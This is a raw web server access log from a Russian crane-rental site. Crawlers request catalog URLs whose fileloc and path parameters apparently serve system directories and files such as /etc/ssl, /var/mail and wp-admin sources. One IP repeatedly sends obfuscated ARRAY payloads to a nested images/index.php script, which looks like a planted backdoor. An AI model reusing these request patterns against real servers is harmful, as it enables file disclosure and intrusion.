216.73.216.53 - - [04/Nov/2025:04:09:05 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FBIO_get_conn_hostname.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 20345 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:09:08 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FSSL_set1_chain.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 19679 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:09:11 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fsnmp%2Fmibs%2FNOTIFICATION-LOG-MIB.txt&path=%2F%2Fusr%2Fshare%2Fsnmp%2Fmibs HTTP/1.0" 200 37868 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:09:12 +1000] "GET /1323392?path=//etc/skel HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:09:15 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Fgetsockcreatecon.3.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 13842 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:09:17 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Fzoneinfo%2Fposix%2FAtlantic HTTP/1.0" 200 30906 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:09:21 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FEC_POINT_hex2point.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 19615 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:09:23 +1000] "GET /1143984?path=//etc/ssl HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:09:24 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Favc_init.3.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 16554 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:09:27 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fsnmp%2Fmibs%2FIPV6-TC.txt&path=%2F%2Fusr%2Fshare%2Fsnmp%2Fmibs HTTP/1.0" 200 14888 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:09:29 +1000] "GET /1233712?path=//var/mail HTTP/1.0" 200 95631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:09:30 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FIPC%3A%3ASysV.3pm.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 17812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:09:33 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FPEM_read_DHparams.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 24314 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:09:36 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FEVP_CipherInit.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 29734 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:09:37 +1000] "GET /1253472?path=//etc/pear HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:09:39 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fsnmp%2Fmibs%2FSNMP-COMMUNITY-MIB.txt&path=%2F%2Fusr%2Fshare%2Fsnmp%2Fmibs HTTP/1.0" 200 28312 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:09:42 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FCMS_sign_receipt.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 16919 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:09:45 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Fi2d_Netscape_RSA.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 16934 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:09:45 +1000] "GET /1481120?path=//etc/ssl HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:09:48 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Fgetfilecon_raw.3.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 12490 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:09:51 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Fi2d_DSAPublicKey.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 17491 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:09:54 +1000] "GET /1516864?path=//etc/ssl HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:09:57 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Fkeyctl_set_reqkey_keyring.3.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 14426 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [04/Nov/2025:04:06:07 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323139363736372p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139333136372q6335656631616438633030343730653233326532373161613364346430373238222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [04/Nov/2025:04:09:58 +1000] "GET /1058128?path=//etc/ssl HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:10:00 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FERR_free_strings.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 16469 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:10:03 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Fbase.3pm.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 17514 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:10:06 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FPEM_write_bio_DSA_PUBKEY.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 24321 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:10:07 +1000] "GET /1174480?path=//etc/pear HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:10:09 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FX509_NAME_get_text_by_OBJ.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 18627 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:10:12 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Fsetcon_raw.3.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 12478 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:10:14 +1000] "GET /1553536?path=//opt/zend HTTP/1.0" 200 28837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:10:15 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FBN_mod_exp.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 18352 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
114.119.147.113 - - [04/Nov/2025:04:10:16 +1000] "GET /2439058272?path=/home/region-gk.ru/data/www/new.region-gk.ru/images HTTP/1.0" 200 17611 "https://region-logist.ru/2439058272?shopdetail=2436182873" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.73.216.53 - - [04/Nov/2025:04:10:21 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FRAND_add.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 17964 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [04/Nov/2025:04:07:29 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323139363834392p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139333234392q3834663562313232646233386330316136386232613032643764653231636666222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [04/Nov/2025:04:10:22 +1000] "GET /1086960?path=//var/ftp HTTP/1.0" 200 16737 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:10:24 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FX509_VERIFY_PARAM_clear_flags.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 22628 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:10:27 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Fbn_wexpand.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 21232 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:10:28 +1000] "GET /1180928?path=//var/ftp HTTP/1.0" 200 16737 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:10:30 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FX509_VERIFY_PARAM_set_purpose.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 22628 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:10:33 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FEVP_PKEY_CTX_new_id.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 16946 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:10:35 +1000] "GET /1065088?path=//usr/tmp HTTP/1.0" 200 14121 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:10:36 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Fbn_sqr_comba4.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 21235 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:10:39 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FDES_quad_cksum.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 25194 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.75.70 - - [04/Nov/2025:04:10:39 +1000] "GET /154458112?shopdetail=0154276815 HTTP/1.0" 200 202219 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [04/Nov/2025:04:07:52 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323139363837322p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139333237322q6336636237316333363839373365663461656538306337656235613063643730222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [04/Nov/2025:04:10:42 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Ffiletest.3pm.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 18826 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:10:44 +1000] "GET /1195504?path=//var/ftp HTTP/1.0" 200 16737 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:10:48 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FBN_BLINDING_set_flags.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 18499 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:10:51 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fopt%2Fphp71%2Fmods-available%2Fexif.ini&path=%2F%2Fopt%2Fphp71%2Fmods-available HTTP/1.0" 200 12409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:10:53 +1000] "GET /1503808?path=//etc/egl HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:10:54 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Fselinux_status_deny_unknown.3.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 12518 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.89.129.236 - - [04/Nov/2025:04:10:56 +1000] "GET /952149488?path=/home/region-gk.ru/data/www/new.region-gk.ru/wp-content HTTP/1.0" 200 26562 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.53 - - [04/Nov/2025:04:10:57 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FEVP_MD_CTX_create.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 22001 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:10:59 +1000] "GET /1276416?path=//etc/ssl HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:11:00 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FSHA512_Init.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 18267 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:11:03 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FBN_RECP_CTX_set.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 17662 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:11:06 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FSMIME_write_CMS.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 17422 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [04/Nov/2025:04:08:15 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323139363839352p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139333239352q3833383131646234623331656431633632623663646465643738323663316631222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [04/Nov/2025:04:11:08 +1000] "GET /1227360?path=//var/ftp HTTP/1.0" 200 16737 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:11:09 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2Fhome%2Ftemp%2Fregion%2Fnew.region-gk.ru%2Fwp-admin%2Fprofile.php&path=%2Fhome%2Ftemp%2Fregion%2Fnew.region-gk.ru%2Fwp-admin HTTP/1.0" 200 12844 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:11:12 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FDumpvalue.3pm.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 18774 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:11:13 +1000] "GET /1086960?fileloc=//var/ftp/welcome.msg&path=//var/ftp HTTP/1.0" 200 12535 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:11:15 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FEC_GROUP_copy.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 21286 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:11:17 +1000] "GET /1376464?path=//var/adm HTTP/1.0" 200 12719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:11:18 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2Fhome%2Ftemp%2Fregion%2Fnew.region-gk.ru%2Fwp-admin%2Foptions-discussion.php&path=%2Fhome%2Ftemp%2Fregion%2Fnew.region-gk.ru%2Fwp-admin HTTP/1.0" 200 34215 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:11:21 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fmime%2Faudio%2Fx-psflib.xml&path=%2F%2Fusr%2Fshare%2Fmime%2Faudio HTTP/1.0" 200 16844 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.76.164 - - [04/Nov/2025:04:11:22 +1000] "GET /catalog/is-hit/arenda-krana-manipulyatora-kmu-novus/?fileloc=//bin/msgattrib&path=//bin HTTP/1.0" 200 191694 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.53 - - [04/Nov/2025:04:11:24 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2Fops.3pm.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 16172 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:11:23 +1000] "GET /1379872?path=//mnt/data HTTP/1.0" 200 12721 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
